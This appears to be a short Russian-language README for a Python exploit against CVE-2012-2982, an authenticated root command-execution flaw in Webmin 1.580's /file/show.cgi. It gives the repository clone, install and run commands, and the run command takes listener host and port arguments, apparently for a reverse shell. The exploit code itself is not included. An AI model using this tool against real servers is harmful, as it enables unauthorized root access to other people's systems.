
Python exploit for CVE-2012-2982
Этот скрипт на Python написан для уязвимости в Webmin 1.580, CVE-2012-2982. Уязвимость существует в компоненте /file/show.cgi и позволяет аутентифицированному пользователю, имеющему доступ к модулю File Manager, выполнять произвольные команды с привилегиями root.
Протестировано на версии Python: Python 3.8.5
Требуемый пакет pip: secrets
git clone https://github.com/OstojaOfficial/CVE-2012-2982.git
pip3 install -r requirements.txt
Для запуска эксплойта используйте команду ниже:
python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>